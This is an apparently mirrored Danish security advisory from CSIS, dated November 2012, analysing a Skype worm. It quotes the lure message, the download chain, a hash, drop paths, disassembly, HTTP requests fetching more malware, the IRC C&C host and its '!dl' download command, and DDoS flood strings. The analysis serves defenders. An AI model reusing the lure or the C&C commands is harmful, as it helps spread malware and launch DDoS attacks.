Quantcast
Channel: CSIS Security Group
Viewing all articles
Browse latest Browse all 247

CSIS Nyheder: Giftig Skype "Orm"

November 19, 2012, 3:11 am
$
0
0

En "orm" spreder sig for øjeblikket via Skype. Den har inkluderet et dansk sprog modul der gør den i stand til at tale "dansk".

Den spreder sig med følgende ordlyd (mellemrum indlagt af CSIS):

”ggggg du ser vanvittigt på dette billede http://g oo.gl/AVzL8?img=[%skype navn%]”

Hvis en Skype bruger vælger at klikke på det medfølgende link hentes den skadelige komponent via "sendspace". Bemærk, at der anvendes mange forskellige URLs til formålet. Trafikmønster findes herunder:

http://go o.gl/AVzL8
--> http://www.send space.com/pro/dl/m02hjf
--> "foto 18.11.2012 profile.zip" -->
foto 18.11.2012 profile.exe (MD5: b93a552918f5c1d4dda49bd58db3dd49)


Vi kan se at denne kode allerede har opnået en pæn udbredelse i Europa med flere end 2000 kliks alene fra Danmark.




Hvis den pågældende zip fil udpakkes og køres vil denne malware kopiere sig til harddisken:

C:Users[%brugerkonto%]AppDataRoamingHgasaz.exe
C:Users[%brugerkonto%]AppDataRoaming4BC7.exe

Den pågældende sti er statisk og bestemmes via "SHGetSpecialFolderPathW".

Når vi kigger på hovedkomponenten står det hurtigt klar at denne malware er yderst frisk: [Mon Nov 19 04:07:37 2012 UTC]. Den injekter sig ved kørsel i iexplore.exe processen:

004068C6    push 00411728h    UTF-16 "Internet Exploreriexplore.exe" xref: 004068C3
004068CB    push 00449E78h    UTF-16 "C:Program Files (x86)Internet Exploreriexplore.exe"
004068D0    call dword ptr [00411240h]    PathAppendW@SHLWAPI.DLL (Import)
004068D6    mov eax, 00449E78h    UTF-16 "C:Program Files (x86)Internet Exploreriexplore.exe"
004068DB    ret     function end 

Der downloades supplerende malware via en HTTP GET som defineres igennem en IRC kanal:

GET /dl/179970419/a8fcb14/0028492385y34857.html HTTP/1.1
User-Agent: Mozilla/4.0
Host: hotfile.com

GET /get/3a3d254720f0d0c9ecbf8cf42a98c15eb4f31bfc/50a9f9f4/2/2a5febb05141e137/aba2173/0028492385y34857 HTTP/1.1
User-Agent: Mozilla/4.0
Host: s149.hotfile.com
Connection: Keep-Alive
Cookie: ip=77.87

HTTP/1.1 200 OK
Server: Hotfile Server v0.2
Date: Mon, 19 Nov 2012 09:20:54 GMT
Content-Type: application/octet-stream
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 55296
Content-Disposition: attachment; filename="0028492385y34857"
Content-Transfer-Encoding: binary
Connection: close

Som tidligere nævnt anvender denne malware en IRC server til C&C funktioner (den aktuelle findes på "photobeat.su", men vi har blokeret flere i CSIS Secure DNS):

!j -c BE,DK,FI,FR,GR,HR,HU,IE,NO,PL,RO,SK #gi
Channel: #gi
* Topic for #gi is: !dl http://hotfile.com/dl/[unikt id]

En af funktionerne i denne kode er at kunne igangsætte DDoS angreb mod definerede mål.

push 00415E8Ch    ASCII "[UDP]: Starting flood on "%s:%d" for %d second(s)"

push 00415EC0h    ASCII "[UDP]: Finished flood on "%s:%d"

Det pågældende modul til DDoS ser ud til at være baseret på "Slowloris":

{sl0wl0riS}- Started fl00ding! "%s" FOR %d MinUt3{s}, va: 00415E30
[Slowloris]: Finished flood on "%s", va: 00415E68

Denne "orm" indeholder endvidere en selvbeskyttende funktion som genoptager processen såfremt den dræbes "%s.Protect "%s" against file removal done!!"

Antivirus detektion er ikke eksisterende:

Agnitum     -     20121116
AntiVir     -     20121116
Antiy-AVL     -     20121116
Avast     -     20121116
AVG     -     20121115
BitDefender     -     20121116
CAT-QuickHeal     -     20121116
ClamAV     -     20121115
Commtouch     -     20121116
Comodo     -     20121116
DrWeb     -     20121116
Emsisoft     -     20121116
eSafe     -     20121115
ESET-NOD32     -     20121116
F-Prot     -     20121116
F-Secure     -     20121116
Fortinet     -     20121116
GData     -     20121116
Ikarus     -     20121116
Jiangmin     -     20121116
K7AntiVirus     -     20121115
Kaspersky     -     20121116
Kingsoft     -     20121112
McAfee     -     20121116
McAfee-GW-Edition     -     20121116
Microsoft     -     20121116
MicroWorld-eScan     -     20121116
Norman     -     20121116
nProtect     -     20121116
Panda     -     20121116
PCTools     -     20121116
Rising     -     20121116
Sophos     -     20121116
SUPERAntiSpyware     -     20121116
Symantec     WS.Reputation.1     20121116
TheHacker     -     20121113
TotalDefense     -     20121115
TrendMicro     -     20121116
TrendMicro-HouseCall     -     20121116
VBA32     -     20121115
VIPRE     -     20121116
ViRobot     -     20121116

Search
Viewing all articles
Browse latest Browse all 247

Trending Articles

Grand galla med gull og glitter

March 19, 2015, 8:59 am

Psykiater Tonny Westergaard

July 25, 2013, 4:47 pm

Jav Uncensored - Tokyo-Hot n1002 Miyu Kitagawa

November 25, 2014, 8:41 am

Moriya Suwako (Touhou)

June 3, 2015, 5:00 pm

BRODERET KLOKKESTRENG MED ORDSPROG 14 X 135 CM.

May 5, 2019, 9:22 am

Naruto Shippuden Episode 471 Subtitle Indonesia

August 11, 2016, 2:02 am

Fin gl. teske i sølv - 2 tårnet - stemplet

February 10, 2016, 4:02 am

Kaffefilterholder fra Knabstrup

March 12, 2017, 12:52 pm

Anders Agger i Herstedvester

June 23, 2013, 12:45 pm

Onkel Joakims Lykkemønt *3 stk* *** Perfekt Stand ***

June 28, 2013, 9:52 am

Sælges: Coral Beta/Flat (Højttaler-enheder)

March 5, 2017, 10:49 am

Starwars landspeeder 7110

March 3, 2020, 6:56 am

NMB48 – Durian Shounen (Dance Version) [2015.07.15]

June 18, 2019, 10:52 am

Le bonheur | question de l'autre

October 24, 2011, 10:19 am

Scope.dk som agent?

December 22, 2015, 12:16 am

Akemi Homura & Kaname Madoka (Puella Magi Madoka Magica)

March 4, 2014, 9:00 am

Tidemands taffel-marmelade julen1934+julen 1937+julen 1938.

September 5, 2018, 12:01 pm

Re: KZUBR MIG/MMA 300 zamena tranzistora

March 14, 2023, 4:33 am

Analyse 0 mundtlig eksamen

February 11, 2017, 3:44 am

DIY - Hæklet bil og flyvemaskine

February 8, 2015, 5:18 am
Search